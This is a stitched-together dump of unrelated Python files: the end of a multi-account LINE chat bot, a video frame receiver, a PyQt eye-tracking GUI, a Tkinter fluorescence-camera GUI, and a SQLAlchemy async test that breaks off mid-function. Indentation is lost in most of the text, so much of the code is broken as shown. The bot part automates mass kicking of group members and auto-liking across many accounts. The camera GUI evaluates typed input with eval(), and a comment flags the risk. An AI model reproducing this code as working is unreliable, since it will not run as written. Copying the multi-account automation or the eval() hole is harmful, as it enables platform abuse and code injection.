mc += "~ " +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
# ki.sendText(msg.to,mc)
# kk.sendText(msg.to,mc)
elif msg.text in ["Cek ban"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text in ["Seeyou"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"There was no blacklist user")
ki.sendText(msg.to,"There was no blacklist user")
kk.sendText(msg.to,"There was no blacklist user")
kc.sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
cl.kickoutFromGroup(msg.to,[jj])
ki.kickoutFromGroup(msg.to,[jj])
kk.kickoutFromGroup(msg.to,[jj])
kc.kickoutFromGroup(msg.to,[jj])
cl.sendText(msg.to,"Blacklist user")
ki.sendText(msg.to,"Blacklist user")
kk.sendText(msg.to,"Blacklist user")
elif msg.text in ["Cancel!"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"😨😨😨😨😨")
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
if op.type == 59:
print op
except Exception as error:
print error
def autoSta():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait["likeOn"] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ki.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kk.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kc.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kb.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kd.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ke.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kf.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kg.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kh.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread1 = threading.Thread(target=autoSta)
thread1.daemon = True
thread1.start()
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(500)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
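# A hedged refactoring sketch, not wired into the handlers above (and
# unreachable after the poll loop): the kick-with-fallback pattern (pick
# a random client, fall back to the others on failure) repeats all
# through bot(). Collapsed into one helper it would look like this
# (assumes random and the KAC client list defined at the top of this file):
def safe_kick(gid, target, clients=None):
    pool = list(clients) if clients else list(KAC)
    random.shuffle(pool)
    for c in pool:
        try:
            c.kickoutFromGroup(gid, [target])
            return True
        except:
            continue
    return False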
|
receiver.py
|
from collections import deque
from threading import Thread
import cv2 as cv
from net import connection
frames = deque()
def get():
if (len(frames)>0):
return frames.popleft()
else:
return None
def save(frame):
# import cv2 as cv
# with open("rec.jpg", 'wb') as writer:
# writer.write(frame)
frames.append(frame)
def init(con : connection):
def loop(con : connection):
while True:
frame = con.recv(decode=False)
save(frame)
Thread(target=loop, args=(con,), daemon=False).start()
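# Usage sketch (assumptions: connection() can be constructed with no
# arguments and recv(decode=False) yields encoded JPEG bytes; adjust to
# the real net.connection API). Decodes queued frames and displays them.
if __name__ == "__main__":
    import numpy as np
    con = connection()  # hypothetical constructor call
    init(con)
    while True:
        raw = get()
        if raw is None:
            continue
        img = cv.imdecode(np.frombuffer(raw, dtype=np.uint8), cv.IMREAD_COLOR)
        if img is not None:
            cv.imshow("stream", img)
            if cv.waitKey(1) & 0xFF == ord('q'):
                break
    cv.destroyAllWindows()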
|
main.py
|
#!/usr/bin/env python3
import os
import sys
import cv2
import copy
import pathlib
import threading
import shutil
import numpy as np
import pyqtgraph as pg
import pandas as pd
from plotting import auto_draw
from preProcess import preprocess
from pupil_tracker import auto_tracker
from glint_tracker import g_auto_tracker
from rationalize import rationalize
from pyqtgraph import PlotWidget
from Interface.user import MyWidget
from PyQt5.QtGui import QIcon, QPixmap
from video_construct import video_construct
from PyQt5 import uic, QtCore, QtGui, QtWidgets
from Interface.video_player import VideoPlayer
from util import mkmessage, get_ROI, get_center
class main(QtWidgets.QMainWindow):
def __init__(self, video = None, file = None):
#Dictionary including index and picture for each
super().__init__()
'''
User interactive widget
'''
self.MyWidget = None
'''
Variables for the best image chosen at the beginning
'''
self.pic_collection = {}
self.wanted_pic = None
'''
Variables that get the class of the tracker
'''
self.track_pupil = None
self.track_glint = None
'''
Variables that store the user entered data
'''
self.Video = None
self.File = None
'''
Variable stored for dynamic plotting
'''
self.current_plot = 0
self.orgdata = None
'''
(start_x, end_x, start_y, end_y)
Variables that show the cropping factor chosen by the user
'''
self.cropping_factor_pupil = [[0,0],[0,0]]
self.cropping_factor_glint = [[0,0],[0,0]]
'''
Variables that get the perfect glint tracking data
'''
self.pupil_blur = None
self.H_count = None
self.threshold_range_glint = None
'''
cue, vgs, dly, mgs
iti is omitted and could be added in mgs
'''
self.stare_posi = {'cue':[], 'vgs':[], 'dly':[], 'mgs':[]}
'''
Load the user interface
'''
uic.loadUi('Interface/dum.ui', self)
self.setWindowTitle('Pupil Tracking')
self.Pupil_click.setEnabled(False)
self.Glint_click.setEnabled(False)
self.Pupil_chose.setEnabled(False)
self.Glint_chose.setEnabled(False)
self.Sync.setEnabled(False)
self.Plotting.setEnabled(False)
self.Analyze.setEnabled(False)
self.Pupil_chose.toggled.connect(self.circle_pupil)
self.Glint_chose.toggled.connect(self.circle_glint)
self.Pupil_click.clicked.connect(self.store_pupil)
self.Glint_click.clicked.connect(self.store_glint)
self.Sync.clicked.connect(self.synchronize_data)
self.Plotting.clicked.connect(self.plot_result)
self.Generate.clicked.connect(self.generate)
self.Analyze.clicked.connect(self.analyze)
'''
Get or set two user entered values
'''
self.VideoText.setText('input/run3.mov')
self.FileText.setText('input/10997_20180818_mri_1_view.csv')
#Create the data output directory
try:
os.mkdir('data_output')
except OSError:
print ("Creation of the directory failed")
'''
Initialize the dynamic plot
'''
self.data = {'r':[0]*500, 'x':[0]*500, 'y':[0]*500, 'blink':[0]*500, 'index':list(range(0, 500))}
self.r_line = self.r_plot.plot(self.data['index'], self.data['r'])
self.x_line = self.x_plot.plot(self.data['index'], self.data['x'])
self.y_line = self.y_plot.plot(self.data['index'], self.data['y'])
self.blink_line = self.blink.plot(self.data['index'], self.data['blink'])
self.timer = QtCore.QTimer()
self.timer.setInterval(60)
self.timer.timeout.connect(self.update_plot_data)
self.timer.start()
self.show()
'''
This one synchronizes original data from the tracker data
'''
def synchronize_data(self):
usable_file_pupil = 'data_output/filter_pupil.csv'
usable_file_glint = 'data_output/filter_glint.csv'
pupil_save = "data_output/rationalized_pupil.csv"
glint_save = "data_output/rationalized_glint.csv"
#Check for availability
try:
pd.read_csv(usable_file_pupil)
pd.read_csv(usable_file_glint)
except:
print("Data Not ready yet!!!!!")
return
#Print the pupil
data_sync_pupil = rationalize(self.File, usable_file_pupil, pupil_save)
data_sync_pupil.rationalized_output()
data_sync_glint = rationalize(self.File, usable_file_glint, glint_save)
data_sync_glint.rationalized_output()
'''
Function that handles <static> plotting by first reading in available data from the csv file
'''
def orgdata_handle(self):
self.orgdata = pd.read_csv(self.File)
#Multiply 60 each because it is 60f/s
self.stare_posi['cue'] = self.orgdata['cue']*60
self.stare_posi['vgs'] = self.orgdata['vgs']*60
self.stare_posi['dly'] = self.orgdata['dly']*60
self.stare_posi['mgs'] = self.orgdata['mgs']*60
'''
Function that handles <dynamic plotting> by updating with the data
'''
def update_plot_data(self):
if self.track_pupil is not None:
#Enable data synchronization as well
self.Sync.setEnabled(True)
#Update the rolling window: drop the oldest sample from each series first
self.data['r'] = self.data['r'][1:]
self.data['x'] = self.data['x'][1:]
self.data['y'] = self.data['y'][1:]
self.data['blink'] = self.data['blink'][1:]
self.data['index'] = self.data['index'][1:]
try:
self.data['r'].append(self.track_pupil.r_value[self.current_plot])
self.data['x'].append(self.track_pupil.x_value[self.current_plot])
self.data['y'].append(self.track_pupil.y_value[self.current_plot])
self.data['blink'].append(self.track_pupil.blink_rate[self.current_plot])
self.data['index'].append(self.data['index'][-1] + 1) # Add a new value 1 higher than the last.
except IndexError:
pass
#Do the error filter, check the length match
if(len(self.data['r']) < len(self.data['index'])):
self.data['r'].append(self.data['r'][-1])
if(len(self.data['x']) < len(self.data['index'])):
self.data['x'].append(self.data['x'][-1])
if(len(self.data['y']) < len(self.data['index'])):
self.data['y'].append(self.data['y'][-1])
if(len(self.data['blink']) < len(self.data['index'])):
self.data['blink'].append(self.data['blink'][-1])
#Update the data for dynamic plotting
self.r_line.setData(self.data['index'], self.data['r'])
self.x_line.setData(self.data['index'], self.data['x'])
self.y_line.setData(self.data['index'], self.data['y'])
self.blink_line.setData(self.data['index'], self.data['blink'])
#Update the current index
self.current_plot += 1
'''
Function that calls pupil tracker through multi-threading
'''
def pupil_tracking(self, ROI, parameters, p_glint):
#Initialize the eye_tracker for pupil
self.track_pupil = auto_tracker(self.Video, ROI, parameters, p_glint)
self.track_pupil.set_events(self.File)
self.track_pupil.run_tracker()
'''
Function that calls glint tracker through multi-threading
'''
def glint_tracking(self, ROI, CPI, parameters_glint):
#Initialize the eye_tracker for glint
self.track_glint = g_auto_tracker(self.Video, ROI, CPI, parameters_glint)
self.track_glint.set_events(self.File)
self.track_glint.run_tracker()
def clear_folder(self, folder):
''' Clear everything in the folder
@param folder - directory to remove and remake
No need to make it a button. input dir should be exploratory data
This has a nice side effect:
On first run, output directories don't exist. This creates them
'''
if os.path.exists(folder):
    shutil.rmtree(folder)
os.makedirs(folder)
'''
Preprocess function to get the pupil threshold
'''
def pupil_threshold(self, center, sf, CPI, parameters):
pre_pupil_threshold = preprocess(center, sf, CPI, parameters['blur'], parameters['canny'])
return pre_pupil_threshold.start()
'''
Preprocess function to get the glint threshold
'''
def glint_threshold(self, center, sf, CPI, parameters):
pre_glint_threshold= preprocess(center, sf, CPI, parameters['blur'], parameters['canny'])
return pre_glint_threshold.d_glint()
'''
Preprocess function to get the pupil blur
'''
def get_blur(self, sf, CPI, parameters, ROI_pupil, ROI_glint):
pre_pupil_blur = preprocess(None, sf, CPI, parameters['blur'], parameters['canny'])
self.pupil_blur = pre_pupil_blur.anal_blur(ROI_pupil, ROI_glint, self.Video)
'''
    The Hough transform needs a count parameter; this calculates the best count for the glint
'''
def get_count(self, sf, ROI, CPI, parameters):
glint_CPI = copy.deepcopy(CPI)
preprocess_glint = preprocess(None, sf, glint_CPI, parameters['blur'], parameters['canny'])
self.H_count = preprocess_glint.g_count(ROI, glint_CPI, parameters, self.Video)
'''
This function calls the preprocess and calls the actual trackers
'''
def analyze(self):
'''
Pre-define the parameters that would later be passed into the tracker
'''
parameters_pupil = {'blur': (20, 20), 'canny': (40, 50), 'stare_posi':None}
parameters_glint = {'blur': (1, 1), 'canny': (40, 50), 'H_count': 8, 'stare_posi':None}
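        # Sketch of what the parameter dicts hold: 'blur' is the blur kernel size,
        # 'canny' the Canny edge thresholds, 'H_count' the Hough accumulator count
        # (glint only), and 'stare_posi' the event frame positions filled in further down.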
'''
        We need both CPI and ROI: ROI is the displacement,
        while CPI is the new (x, y) position
'''
ROI_pupil = get_ROI(self.cropping_factor_pupil)
ROI_glint = get_ROI(self.cropping_factor_glint)
CPI_pupil = self.cropping_factor_pupil
CPI_glint = self.cropping_factor_glint
# We also need the center of pupil and glint based on user-chosen area
center_pupil = get_center(ROI_pupil)
center_glint = get_center(ROI_glint)
        # check that the user has drawn ROI boxes for both pupil and glint
        # without these we cannot continue and would hit exceptions below
for cntr in [center_pupil, center_glint]:
if cntr[0] == 0 and cntr[1] == 0:
mkmessage('Draw ROI boxes for both pupil and glint!')
return
'''
        Toggle the interface buttons
'''
self.Analyze.setEnabled(False)
self.Plotting.setEnabled(True)
'''
This is for pre-processing
'''
#Pre_calculate the perfect threshold for glint detection
self.threshold_range_glint = self.glint_threshold(center_glint, 1, CPI_glint, parameters_glint)
parameters_glint['threshold'] = self.threshold_range_glint
print("first pass pass parameters")
print(f" pupil: {parameters_pupil}")
print(f" glint: {parameters_glint}")
        #Preprocess the blurring factor for the pupil
t1 = threading.Thread(target = self.get_blur, args = (4, CPI_pupil, parameters_pupil, ROI_pupil, ROI_glint))
#Get the count for hough transform
t2 = threading.Thread(target = self.get_count, args = (1, ROI_glint, CPI_glint, parameters_glint))
#Run the thread
t1.start()
t2.start()
t1.join()
t2.join()
'''
    This is for pre-processing as well...
'''
#4 is the shrinking factor that could boost up the speed
th_range_pupil = self.pupil_threshold(center_pupil, 4, CPI_pupil, parameters_pupil)
        #Add the best blurring factor for the pupil
parameters_pupil['blur'] = self.pupil_blur
#Add the perfect threshold value
parameters_pupil['threshold'] = th_range_pupil
#Add the perfect H_count value for glint. Pupil doesn't need this
parameters_glint['H_count'] = self.H_count
#Put in the ideal staring position that might be used in the tracker portion
parameters_pupil['stare_posi'] = self.stare_posi
parameters_glint['stare_posi'] = self.stare_posi
# useful to know for e.g. ./tracker.py
print("second pass parameters")
print(f" pupil: {parameters_pupil}")
print(f" glint: {parameters_glint}")
#Create the thread for both pupil and glint
        #No need to join because we don't want the user interface to freeze
t2 = threading.Thread(target=self.pupil_tracking, args=(ROI_pupil, parameters_pupil, ROI_glint))
t3 = threading.Thread(target=self.glint_tracking, args=(ROI_glint, CPI_glint, parameters_glint))
#Start the thread for final calculation
t2.start()
t3.start()
'''
    Function that clears all the testing data
'''
def clear_testing(self):
self.clear_folder("./output")
self.clear_folder("./glint_output")
self.clear_folder("./glint_testing")
self.clear_folder("./testing")
'''
    This function generates the chosen picture so the user can select their preferred area
'''
def generate(self):
#Enable all the functional buttons
self.Analyze.setEnabled(True)
self.Generate.setEnabled(False)
self.Pupil_chose.setEnabled(True)
self.Glint_chose.setEnabled(True)
        #Clear all the testing folders. No other use but testing
self.clear_testing()
#Check the validity of two files entered
self.Video = self.VideoText.text()
self.File = self.FileText.text()
if not os.path.exists(self.Video): #or not os.path.exists(File):
print(f"Video file '{self.Video}' does not exist")
return
if not os.path.exists(self.File):
print(f"Text file '{self.File}' does not exist")
return
        #Create and start a thread to break the video down into frames in the output directory
        t1 = threading.Thread(target=self.to_frame, args=(self.Video, None))
        t1.start()
#Read in the original data file, maybe it has some uses later?
self.orgdata_handle()
# disable line editing once we've picked our files to avoid confusion
self.VideoText.setEnabled(False)
self.FileText.setEnabled(False)
#Get and save the best picture for the user to crop
self.wanted_pic = self.to_frame(self.Video)
        if self.wanted_pic is not None:
sample = self.pic_collection[self.wanted_pic]
cv2.imwrite('input/chosen_pic.png', sample)
#Set the text in the interface to tell the user it's time to carry on
self.label_5.setText("Generating done, choose(Pupil/Glint)")
'''
For user to choose pupil in the interface
'''
def circle_pupil(self):
        #First clear every widget in the layout
for i in reversed(range(self.LayVideo.count())):
self.LayVideo.itemAt(i).widget().setParent(None)
#Then set the new widget
self.Pupil_click.setEnabled(True)
self.Glint_click.setEnabled(False)
self.MyWidget = MyWidget(self)
self.LayVideo.addWidget(self.MyWidget)
'''
For user to choose glint in the interface
'''
def circle_glint(self):
        #First clear every widget in the layout
for i in reversed(range(self.LayVideo.count())):
self.LayVideo.itemAt(i).widget().setParent(None)
#Then set the new widget
self.Pupil_click.setEnabled(False)
self.Glint_click.setEnabled(True)
self.MyWidget = MyWidget(self)
self.LayVideo.addWidget(self.MyWidget)
'''
    Store all variables corresponding to the pupil region chosen by the user
'''
def store_pupil(self):
input_d = {
"name": self.cropping_factor_pupil,
"data": (self.p_x, self.p_xl, self.p_y, self.p_yl)
}
self.Pupil_store.setText('Pupil: Stored')
self.store_fun(input_d)
'''
    Store all variables corresponding to the glint region chosen by the user
'''
def store_glint(self):
input_d = {
"name": self.cropping_factor_glint,
"data": (self.g_x, self.g_xl, self.g_y, self.g_yl)
}
self.Glint_store.setText('Glint: Stored')
self.store_fun(input_d)
    def store_fun(self, input_d = None):
        inner_count = 0
        action = (
            self.MyWidget.begin.x(),
            self.MyWidget.end.x(),
            self.MyWidget.begin.y(),
            self.MyWidget.end.y()
        )
        text = ('x: ', 'xl: ', 'y: ', 'yl: ')
        for i in range(0, 2):
            for j in range(0, 2):
                input_d["name"][i][j] = action[inner_count]
                input_d["data"][inner_count].setText(text[inner_count] + str(action[inner_count]))
                inner_count += 1
'''
    Function that statically plots the tracking results into the "plotting" folder for developer inspection
'''
def plot_result(self):
        #Plot pupil and glint results, both original and filtered
ad = auto_draw(self.stare_posi)
#Original Pupil
ad.read('data_output/origin_pupil.csv')
ad.draw_x('plotting/origin_x_pupil.png')
ad.draw_y('plotting/origin_y_pupil.png')
ad.draw_r('plotting/origin_r_pupil.png')
ad.draw_blink('plotting/blink_pupil.png')
#filtered Pupil
af = auto_draw(self.stare_posi)
af.read('data_output/filter_pupil.csv')
af.draw_x('plotting/filtered_x_pupil.png')
af.draw_y('plotting/filtered_y_pupil.png')
af.draw_r('plotting/filtered_r_pupil.png')
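        #Original glint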
ag = auto_draw(self.stare_posi)
ag.read('data_output/origin_glint.csv')
ag.draw_x('plotting/origin_x_glint.png')
ag.draw_y('plotting/origin_y_glint.png')
ag.draw_r('plotting/origin_r_glint.png')
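        #Filtered glint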
fg = auto_draw(self.stare_posi)
fg.read('data_output/filter_glint.csv')
fg.draw_x('plotting/filtered_x_glint.png')
fg.draw_y('plotting/filtered_y_glint.png')
fg.draw_r('plotting/filtered_r_glint.png')
'''
Function to choose the best eye picture for user to crop
'''
def to_frame(self, video, limit = 300):
maximum = 0
wanted = 0
#i counts the image sequence generated from the video file
i = 0
cap = cv2.VideoCapture(video)
while(cap.isOpened()):
ret, frame = cap.read()
            if not ret:
break
            if limit is not None:
                #Test for a non-blinking image (find the image with the largest dark area)
if len(np.where(frame < 100)[0]) > maximum and i < limit:
maximum = len(np.where(frame < 100)[0])
wanted = i
                #Add a limit so it runs faster when testing
                #We need a well-opened eye to run the machine learning program on to determine the parameters.
if i > limit:
return wanted
self.pic_collection[i] = frame
                if i % 25 == 0:
                    print("%d/%d (max) images scanned" % (i, limit))
            else:
                cv2.imwrite('output/%015d.png' % i, frame)
            i += 1
return wanted
if __name__ == '__main__':
#Later put into the user interface
App = QtWidgets.QApplication([])
WINDOW = main()
sys.exit(App.exec_())
|
RUN_ME_Flouroscence.py
|
#########
#Imports#
#########
# Python Basics
import sys
import os
import ast
from threading import Thread
import time
# Interfacing
if sys.version_info[0] == 3: # for Python3
import tkinter as tk
else: # for Python2
import Tkinter as tk
# Image process
import PIL.Image, PIL.ImageTk
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
# Secondary Script
from Secondary_Scripts.VideoCapture import VideoCapture
from Secondary_Scripts.Flouroscence import Flouro
# Initialisation Parameters
import Parameters as para
###########
#Operation#
###########
class App:
def __init__(self, window_title):
self.window = tk.Tk()
self.window.wm_title(window_title)
# open video source (by default this will try to open the computer webcam)
self.vid = VideoCapture()
        # initialise fluorescence plot
self.floursize = para.floursize
self.flour = Flouro(self.floursize, self.floursize)
self.cropdimension = para.cropdimension
# File saving setting
        self.save_dir = para.save_dir  # the saving directory must already exist
def dir_update(event):
self.save_dir = dir_entry.get()
dir_res.configure(text='dir = ' + self.save_dir)
tk.Label(self.window, text='Save Directory', font='Helvetica 12 bold').grid(row=0, column=0)
dir_entry = tk.Entry(self.window, textvariable=tk.StringVar(self.window, value=self.save_dir))
dir_entry.bind("<Return>", dir_update)
dir_entry.grid(row=1, column=0)
dir_res = tk.Label(self.window, text='dir = ' + self.save_dir)
dir_res.grid(row=2, column=0)
def file_update(event):
frame = self.vid.get_frame()
save_filename = file_entry.get()
save_name = self.save_dir + save_filename
frame_image = PIL.Image.fromarray(frame)
frame_image.save(os.path.join(self.save_dir, save_filename))
file_res.configure(text='file saved at: ' + save_name)
file_entry.delete(0, tk.END)
file_entry.insert(0, '.bmp')
tk.Label(self.window, text='Save filename', font='Helvetica 12 bold').grid(row=3, column=0)
file_entry = tk.Entry(self.window, textvariable=tk.StringVar(self.window, value='.bmp'))
file_entry.bind("<Return>", file_update)
file_entry.grid(row=4, column=0)
file_res = tk.Label(self.window, text='file not saved')
file_res.grid(row=5, column=0)
# Exposure Time setting
def evaluate(event):
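            # NOTE: eval() accepts expressions such as 6.7e7, but it executes
            # arbitrary input; float(entry.get()) would be safer if plain
            # numbers are enough.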
ExposureTime = eval(entry.get())
self.vid.c0.ExposureTime = ExposureTime
            exposure_res.configure(text='Exposure Time [us] = ' + str(ExposureTime))
tk.Label(self.window, text="Limit=39 to 6.71089e+07").grid(row=2, column=1)
entry = tk.Entry(self.window, textvariable=tk.StringVar(self.window, value=str(self.vid.c0.ExposureTime)))
entry.bind("<Return>", evaluate)
entry.grid(row=1, column=1)
exposure_res = tk.Label(self.window, text='Exposure Time [us] = ' + str(self.vid.c0.ExposureTime), font='Helvetica 12 bold')
exposure_res.grid(row=0, column=1)
# crop location setting
self.cropLoc = para.cropLoc_flouro
def cropLoc_update(event):
self.cropLoc = ast.literal_eval(cropLoc_entry.get())
cropLoc_res.configure(text='Crop Location = ' + str(self.cropLoc))
cropLoc_entry = tk.Entry(self.window, textvariable=tk.StringVar(self.window, value=str(self.cropLoc)))
cropLoc_entry.bind("<Return>", cropLoc_update)
cropLoc_entry.grid(row=4, column=1)
cropLoc_res = tk.Label(self.window, text='Crop Location = ' + str(self.cropLoc), font='Helvetica 12 bold')
cropLoc_res.grid(row=3, column=1)
# crop dimension setting
def cropdimension_update(event):
self.cropdimension = ast.literal_eval(cropdimension_entry.get())
cropdimension_res.configure(text='Crop Dimensions = ' + str(self.cropdimension))
cropdimension_entry = tk.Entry(self.window, textvariable=tk.StringVar(self.window, value=str(self.cropdimension)))
cropdimension_entry.bind("<Return>", cropdimension_update)
cropdimension_entry.grid(row=1, column=2)
cropdimension_res = tk.Label(self.window, text='Crop Dimensions = ' + str(self.cropdimension), font='Helvetica 12 bold')
cropdimension_res.grid(row=0, column=2)
        # Entries for fluorescence y limit
self.ylim = para.ylim
def ylim_update(event):
self.ylim = ast.literal_eval(ylim_entry.get())
ylim_res.configure(text='Y Limit = ' + str(self.ylim))
self.flour.ax.set_ylim(self.ylim)
ylim_entry = tk.Entry(self.window, textvariable=tk.StringVar(self.window, value=str(self.ylim)))
ylim_entry.bind("<Return>", ylim_update)
ylim_entry.grid(row=1, column=3)
ylim_res = tk.Label(self.window, text='Y Limit = ' + str(self.ylim), font='Helvetica 12 bold')
ylim_res.grid(row=0, column=3)
        # Entries for fluorescence x limit
self.xlim = para.xlim
def xlim_update(event):
self.xlim = ast.literal_eval(xlim_entry.get())
            xlim_res.configure(text='X Limit = ' + str(self.xlim))
xlim_entry = tk.Entry(self.window, textvariable=tk.StringVar(self.window, value=str(self.xlim)))
xlim_entry.bind("<Return>", xlim_update)
xlim_entry.grid(row=4, column=3)
xlim_res = tk.Label(self.window, text='X Limit = ' + str(self.xlim), font='Helvetica 12 bold')
xlim_res.grid(row=3, column=3)
# Value for sum
tk.Label(self.window, text='Flouroscence Sum = ', font='Helvetica 12 bold').grid(row=3, column=2)
self.flourSum_res = tk.Label(self.window, text='0E0', font='Helvetica 12 bold')
self.flourSum_res.grid(row=4, column=2)
# Create a canvas that can fit the above video source size
scale = para.scale_flouro
self.width, self.height = int(scale * 1262), int(scale * 964)
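        # 1262 x 964 appears to be the camera's native frame size (an assumption
        # based on the hard-coded numbers); the canvas is that size scaled by
        # para.scale_flouro.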
self.canvas_img = tk.Canvas(self.window, width=self.width, height=self.height)
self.canvas_img.grid(row=6, column=0, columnspan=2, rowspan=2)
# Create a canvas that can fit the slice plot
self.canvas_flour = FigureCanvasTkAgg(self.flour.fig, master=self.window)
self.canvas_flour.get_tk_widget().grid(row=6, column=2, columnspan=2, rowspan=2)
# for performance testing
self.time = time.time()
self.old_time = self.time
# Starting threads of processes
thread1 = Thread(target=self.operate_camera)
thread2 = Thread(target=self.update_feed)
thread3 = Thread(target=self.update_flouro)
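        # NOTE: these worker loops run forever; if the process should exit when
        # the window closes, marking the threads daemon=True before starting
        # them is one option (assuming no cleanup is needed).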
thread1.start()
thread2.start()
thread3.start()
self.window.mainloop()
# operate camera
def operate_camera(self):
while True:
self.vid.operate_camera()
# self.old_time = self.time
# self.time = time.time()
# print(self.time-self.old_time)
# update for video_feed
def update_feed(self):
while True:
frame = self.vid.get_frame()
feed_frame = self.flour.get_feed(frame, self.cropLoc, self.cropdimension, self.width, self.height)
# Creating display image
self.photo = PIL.ImageTk.PhotoImage(image=feed_frame)
self.canvas_img.create_image(0, 0, image=self.photo, anchor=tk.NW)
time.sleep(para.timesleep)
# self.old_time = self.time
# self.time = time.time()
# print(self.time-self.old_time)
    # update for fluorescence plot
def update_flouro(self):
while True:
# Get a frame from the video source
frame = self.vid.get_frame()
# Get update
self.flour.get_plot(frame, self.cropLoc, self.cropdimension, self.xlim, self.flourSum_res)
# self.old_time = self.time
# self.time = time.time()
# print(self.time-self.old_time)
#####
#Run#
#####
# Create a window and pass it to the Application object
app = App("Flouroscence")
|
test_engine_py3k.py
|
import asyncio
from sqlalchemy import Column
from sqlalchemy import create_engine
from sqlalchemy import delete
from sqlalchemy import event
from sqlalchemy import exc
from sqlalchemy import func
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import testing
from sqlalchemy import text
from sqlalchemy import union_all
from sqlalchemy.ext.asyncio import async_engine_from_config
from sqlalchemy.ext.asyncio import create_async_engine
from sqlalchemy.ext.asyncio import engine as _async_engine
from sqlalchemy.ext.asyncio import exc as asyncio_exc
from sqlalchemy.ext.asyncio.base import ReversibleProxy
from sqlalchemy.ext.asyncio.engine import AsyncConnection
from sqlalchemy.ext.asyncio.engine import AsyncEngine
from sqlalchemy.pool import AsyncAdaptedQueuePool
from sqlalchemy.testing import assertions
from sqlalchemy.testing import async_test
from sqlalchemy.testing import combinations
from sqlalchemy.testing import config
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import expect_raises_message
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_false
from sqlalchemy.testing import is_none
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing import ne_
from sqlalchemy.util.concurrency import greenlet_spawn
class AsyncFixture:
@config.fixture(
params=[
(rollback, run_second_execute, begin_nested)
for rollback in (True, False)
for run_second_execute in (True, False)
for begin_nested in (True, False)
]
)
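    # The params above enumerate all 2*2*2 = 8 combinations of
    # (rollback, run_second_execute, begin_nested).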
def async_trans_ctx_manager_fixture(self, request, metadata):
rollback, run_second_execute, begin_nested = request.param
t = Table("test", metadata, Column("data", Integer))
eng = getattr(self, "bind", None) or config.db
t.create(eng)
async def run_test(subject, trans_on_subject, execute_on_subject):
async with subject.begin() as trans:
if begin_nested:
if not config.requirements.savepoints.enabled:
config.skip_test("savepoints not enabled")
if execute_on_subject:
nested_trans = subject.begin_nested()
else:
nested_trans = trans.begin_nested()
async with nested_trans:
if execute_on_subject:
await subject.execute(t.insert(), {"data": 10})
else:
await trans.execute(t.insert(), {"data": 10})
# for nested trans, we always commit/rollback on the
# "nested trans" object itself.
# only Session(future=False) will affect savepoint
# transaction for session.commit/rollback
if rollback:
await nested_trans.rollback()
else:
await nested_trans.commit()
if run_second_execute:
with assertions.expect_raises_message(
exc.InvalidRequestError,
"Can't operate on closed transaction "
"inside context manager. Please complete the "
"context manager "
"before emitting further commands.",
):
if execute_on_subject:
await subject.execute(
t.insert(), {"data": 12}
)
else:
await trans.execute(
t.insert(), {"data": 12}
)
# outside the nested trans block, but still inside the
# transaction block, we can run SQL, and it will be
# committed
if execute_on_subject:
await subject.execute(t.insert(), {"data": 14})
else:
await trans.execute(t.insert(), {"data": 14})
else:
if execute_on_subject:
await subject.execute(t.insert(), {"data": 10})
else:
await trans.execute(t.insert(), {"data": 10})
if trans_on_subject:
if rollback:
await subject.rollback()
else:
await subject.commit()
else:
if rollback:
await trans.rollback()
else:
await trans.commit()
if run_second_execute:
